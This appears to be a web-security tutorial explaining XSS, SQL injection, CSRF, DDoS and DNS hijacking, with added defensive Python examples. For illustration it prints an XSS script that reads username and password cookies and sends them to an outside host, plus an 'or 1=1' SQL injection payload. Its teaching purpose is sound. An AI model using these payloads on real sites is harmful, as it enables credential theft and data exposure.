🎈 XSS attack
- The full name is Cross Site Scripting. To distinguish it from Cascading Style Sheets (CSS), it goes by the abbreviation XSS instead.
- In an XSS attack, the attacker tampers with a web page to inject a malicious HTML script, usually JavaScript, which takes control of the user's browser and performs malicious operations when the user views the page.
- XSS attacks are common in forums, blogs and similar applications. Attackers can steal important data such as users' cookies and passwords, then forge transactions, steal user property and obtain intelligence and other private information.
- As shown in the figure above, if what the user types into the comment box is not normal text but a JavaScript script, and the backend stores the user's data directly in the database without processing it, then the browser of every other user who later visits the page will inevitably execute that script.
- Of course, this is just a prank; a real attacker will not stop at pranks and will more likely want to use such injected scripts to obtain your personal information, even your account password and other data.
- As can be seen from the figure above, the user actually introduced a third-party script when commenting. That script reads the cookie information from your browser and sends it to a specified endpoint to be saved, at which point your information has been leaked:
```javascript
// Logic inside attack.js
var uname = $.cookie('username'); // read the account name
var pwd = $.cookie('password');   // read the password
// send the request
$('body').append(`<script src="http://autofelix.com/index.php?username=${uname}&password=${pwd}"></script>`);
```
- In the logic above, the script reads your personal information and sends it to a backend PHP file to be processed and saved, so your personal information has leaked. Preventing XSS attacks is therefore very important in network security.
- The backend should never trust data submitted by the user. When it receives user-submitted information it must sanitize it first.
- Sanitizing means filtering special characters: for example, the `<` and `>` of a JavaScript script are escaped before the data is stored, which effectively prevents XSS attacks.
- Set the `HttpOnly` attribute on the cookie, so that JavaScript cannot read the cookie information. This also effectively prevents an XSS attack from stealing cookie contents.
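The two defenses above, escaping a comment before it is stored and issuing the session cookie with `HttpOnly`, written out as an added Python example (this is not code from the original post; the function names, the sample comment and the `SameSite=Lax` choice are this example's own):

```python
# Added example (not from the original post): sanitize a comment before it is
# stored, and issue the session cookie with HttpOnly so page scripts cannot
# read it. Function names, the sample comment and the SameSite value are
# this example's own assumptions.
import html
from http.cookies import SimpleCookie

# Constructed sample: the kind of "comment" an XSS attacker would submit.
MALICIOUS_COMMENT = '<script src="http://autofelix.com/attack.js"></script>nice post'


def sanitize_comment(raw: str) -> str:
    """Escape the characters that let text be interpreted as HTML.

    html.escape turns <, >, &, " and ' into entities, so the stored value
    renders as literal text instead of being parsed as markup.
    """
    return html.escape(raw, quote=True)


def build_session_cookie(session_id: str) -> str:
    """Return a Set-Cookie header value for a session id that JavaScript cannot read."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True   # document.cookie will not expose it
    cookie["session"]["secure"] = True     # only sent over HTTPS
    cookie["session"]["samesite"] = "Lax"  # assumed policy; helps against CSRF too
    return cookie["session"].OutputString()


if __name__ == "__main__":
    print("stored in DB:", sanitize_comment(MALICIOUS_COMMENT))
    print("Set-Cookie  :", build_session_cookie("abc123"))
```

Escaping at storage time matches the post's advice; many frameworks instead escape at render time, which is equivalent as long as every output path does it. The `HttpOnly` flag does not stop the script from running, it only removes the cookie as a target.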
🎈 SQL Injection
- A SQL injection attack means the attacker injects malicious SQL commands into an HTTP request. When the server builds its database SQL from the request parameters, the malicious SQL is built into the statement and executed in the database, letting the attacker obtain the data they are interested in or perform sensitive operations such as reading, modifying, deleting and inserting, so that data is tampered with at will.
- A SQL injection attack does require the attacker to know something about the database tables. For example, your project is open source and the database account and password were accidentally disclosed; or your website went online without debug mode turned off, so anyone interested can guess the table structure from the error output on the site; there is also blind injection, where interested parties guess the structure of the data tables blindly, but this is the hardest.
- SQL injection can be prevented with precompiled statements, and binding parameters is the best way to prevent SQL injection. With SQL precompilation and parameter binding, the malicious SQL is treated as a parameter of the SQL statement rather than executed as a SQL command.
```sql
# SQL that normally fetches one user's record
select * from users where id=1
# with "1 or 1=1" injected, every row in the users table is returned, leaking the data
select * from users where id=1 or 1=1
```
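To make the "treated as a parameter, not as a command" point concrete, here is an added Python example (not from the original post) that runs the post's `1 or 1=1` input through both a string-concatenated query and a bound-parameter query against an in-memory SQLite database; the table contents and function names are constructed for the example:

```python
# Added example (not from the original post): the same lookup built by string
# concatenation versus with a bound parameter, run against an in-memory
# SQLite database. Table rows and function names are constructed here.
import sqlite3

INJECTED_ID = "1 or 1=1"   # the payload from the post's example


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (id integer primary key, name text)")
    conn.executemany("insert into users values (?, ?)",
                     [(1, "alice"), (2, "bob"), (3, "carol")])
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, user_id: str):
    # The request parameter is pasted straight into the statement, so
    # "1 or 1=1" becomes part of the WHERE clause and matches every row.
    sql = "select id, name from users where id=" + user_id
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, user_id: str):
    # The parameter is bound: the database receives the text '1 or 1=1' as a
    # value to compare against id, never as SQL, so nothing matches.
    return conn.execute("select id, name from users where id=?", (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", find_user_vulnerable(db, INJECTED_ID))  # all three rows
    print("bound       :", find_user_safe(db, INJECTED_ID))        # no rows
    print("bound, id 1 :", find_user_safe(db, "1"))                # only alice
```

The same split exists in every driver: PHP's PDO `prepare`/`execute` with `?` placeholders, Java's `PreparedStatement`, and so on. The important part is that the parameter value never becomes part of the statement text.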
🎈 CSRF attack
- CSRF, full name Cross Site Request Forgery, is an attack in which the attacker performs illegal operations as a legitimate user through cross-site requests, such as transfers or posting comments. Its core is to exploit the browser's Cookie or the server's Session strategy to steal the user's identity.
- Suppose you are on website A and open website B in another tab. Page B has malicious intent and makes the browser send an HTTP request to website A.
- Because website A is open, the browser holds website A's cookie, which carries the identity authentication information. The malicious request automatically brings this information along, which leads to identity hijacking and unintended operation results.
- The corresponding defenses against CSRF attacks are: form tokens, verification codes (captchas), Referer checking, etc.
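Two of the defenses just listed, a form token and a Referer check, as an added Python example (not from the original post). The token is tied to the session with an HMAC so a token captured from another session cannot be replayed; the secret, host name and function names are this example's own, and no web framework is assumed:

```python
# Added example (not from the original post): a form token bound to the session
# with an HMAC, plus a Referer check, two of the defenses the post names.
# The secret, host name and function names are this example's own.
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_SECRET = b"constructed-server-secret-rotate-me"  # placeholder value
SITE_HOST = "a.example"                                  # "website A" in the post


def issue_form_token(session_id: str) -> str:
    """Create a token that is only valid for this session.

    The random nonce makes each form unique; the HMAC ties the nonce to the
    session so a token obtained elsewhere does not verify here.
    """
    nonce = secrets.token_hex(16)
    tag = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{tag}"


def verify_form_token(session_id: str, token: str) -> bool:
    """Recompute the HMAC for this session and compare in constant time."""
    nonce, _, tag = token.partition(".")
    if not nonce or not tag:
        return False
    expected = hmac.new(SERVER_SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tag)


def referer_is_trusted(referer) -> bool:
    """Reject a state-changing request whose Referer is missing or from another host."""
    if not referer:
        return False
    return urlsplit(referer).hostname == SITE_HOST


def accept_transfer(session_id: str, form: dict, headers: dict) -> bool:
    """Combined check a POST /transfer handler on website A might run."""
    return (verify_form_token(session_id, form.get("csrf_token", ""))
            and referer_is_trusted(headers.get("Referer")))


if __name__ == "__main__":
    sid = "sess-1"
    tok = issue_form_token(sid)
    print("same session, good Referer:",
          accept_transfer(sid, {"csrf_token": tok}, {"Referer": "https://a.example/form"}))
    print("forged from site B        :",
          accept_transfer(sid, {}, {"Referer": "https://b.example/"}))
```

Site B cannot read the token from site A's page (same-origin policy), so its forged form cannot include a valid value. A Referer check alone is weaker, because browsers and privacy settings may strip the header, which is why the example treats a missing Referer as untrusted rather than as a pass.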
🎈 DDOS attack
- DDoS, full name Distributed Denial of Service, is an upgraded version of the denial-of-service attack. Denial of service simply means making your service unable to serve users normally, i.e. the service goes down. It is usually aimed at servers that provide services to the outside world, such as the common web services, mail services, DNS services and instant messaging services.
- In the early days, launching a DoS attack was very easy: just write a program that overloads the service so it has no time to serve normally, that is, request the service many times in one second until the target server's memory runs out and it collapses.
- Later, as technology developed, today's servers are all distributed, and a service is no longer provided by a single server. Behind one service there are countless CDN nodes and countless web servers. Relying on a single machine to attack such a distributed network is like hitting a stone with an egg, and nowadays many DDoS attacks are not free, so the attacker easily ends up losing more than they gain.
- Defenses: with technology as it is today, such attacks cannot be eliminated completely, only mitigated by technical means. These include traffic scrubbing, SYN cookies and more.
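The post names SYN cookies without showing how they work. As an added Python example (not from the original post), here is a simplified SYN cookie: the server encodes a timer tick, an MSS index and a keyed hash of the connection into the initial sequence number of its SYN-ACK instead of keeping a half-open connection in memory, and only allocates state when a returning ACK carries a cookie that still validates. The bit layout follows the classic scheme in spirit; the secret, timer granularity and MSS table are this example's own:

```python
# Added example (not from the original post): a simplified SYN cookie, the
# SYN-flood defense the post names. Layout: 5 bits of timer tick, 3 bits of
# MSS index, 24 bits of keyed hash. The secret, tick size and MSS table are
# this example's own assumptions, not any particular kernel's values.
import hashlib
import hmac

SECRET = b"constructed-per-boot-secret"
MSS_TABLE = [536, 1220, 1440, 1460]   # encodable MSS values, smallest first
MAX_AGE = 4                            # accept cookies up to 4 timer ticks old


def _hash24(src_ip, dst_ip, src_port, dst_port, t):
    """24-bit keyed hash over the connection 4-tuple and the timer tick."""
    msg = f"{src_ip}|{dst_ip}|{src_port}|{dst_port}|{t}".encode()
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:3], "big")


def make_syn_cookie(src_ip, dst_ip, src_port, dst_port, client_isn, mss, t):
    """Sequence number to send in the SYN-ACK instead of queueing any state."""
    # Largest table entry not above the client's MSS (index 0 if none fits).
    mss_idx = max((i for i, m in enumerate(MSS_TABLE) if m <= mss), default=0)
    low = (_hash24(src_ip, dst_ip, src_port, dst_port, t) + client_isn) & 0xFFFFFF
    return ((t & 0x1F) << 27) | (mss_idx << 24) | low


def check_syn_cookie(cookie, src_ip, dst_ip, src_port, dst_port, client_isn, now_t):
    """Validate (ack_number - 1) from the final ACK; return the MSS to use, or None."""
    t5 = cookie >> 27
    mss_idx = (cookie >> 24) & 0x7
    age = (now_t - t5) % 32            # ticks since the cookie was issued
    if age > MAX_AGE:
        return None                    # too old: attacker replay or stale client
    t = now_t - age                    # reconstruct the full tick value
    expected = (_hash24(src_ip, dst_ip, src_port, dst_port, t) + client_isn) & 0xFFFFFF
    if (cookie & 0xFFFFFF) != expected:
        return None                    # forged or for a different connection
    return MSS_TABLE[mss_idx]


if __name__ == "__main__":
    # Constructed connection: client 198.51.100.7:40000 -> server 203.0.113.1:80
    c = make_syn_cookie("198.51.100.7", "203.0.113.1", 40000, 80, 12345, 1460, t=100)
    print("cookie      :", hex(c))
    print("valid at 102:", check_syn_cookie(c, "198.51.100.7", "203.0.113.1", 40000, 80, 12345, 102))
    print("valid at 110:", check_syn_cookie(c, "198.51.100.7", "203.0.113.1", 40000, 80, 12345, 110))
```

During a flood the server answers every SYN this way at constant cost, and only a client that completes the handshake with a matching cookie consumes a connection slot. The price is that options not encoded in the cookie are lost, which is why real stacks only turn SYN cookies on once the backlog overflows.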
🎈 DNS Hijacking
- In today's Internet traffic, the traffic generated by HTTP/HTTPS web services accounts for the vast majority.
- Web services are in full swing, and behind them is an unsung hero, the domain name resolution system, which resolves a domain name to an IP address. Every domain name lookup must go through DNS, which shows how important it is.
- It is precisely because of its importance that DNS hijacking is readily exploited by people with ulterior motives.
- In the early days little thought was given to security, which is why DNS is easy to hijack.
- If an attacker tampers with the DNS resolution settings and changes a domain name's normal IP to an illegal IP controlled by the attacker, then when we visit the domain name we do not reach the corresponding website but a fake one or one with ulterior motives. This attack method is DNS hijacking.
- At its mildest, DNS hijacking causes the loss of users; at its most serious, it can lure users to illegal websites controlled by the attacker, which may leak important information such as bank card numbers, mobile phone numbers and account passwords.
- Later DNSSEC appeared. Although it solved the hijacking problem to a certain extent, it has not been widely deployed in China, so Alibaba and Tencent launched HttpDNS services, which can suppress this attack to some degree.
- Alternatively, install an SSL certificate. An SSL certificate provides server authentication, so a connection error caused by DNS hijacking can be detected and terminated in time.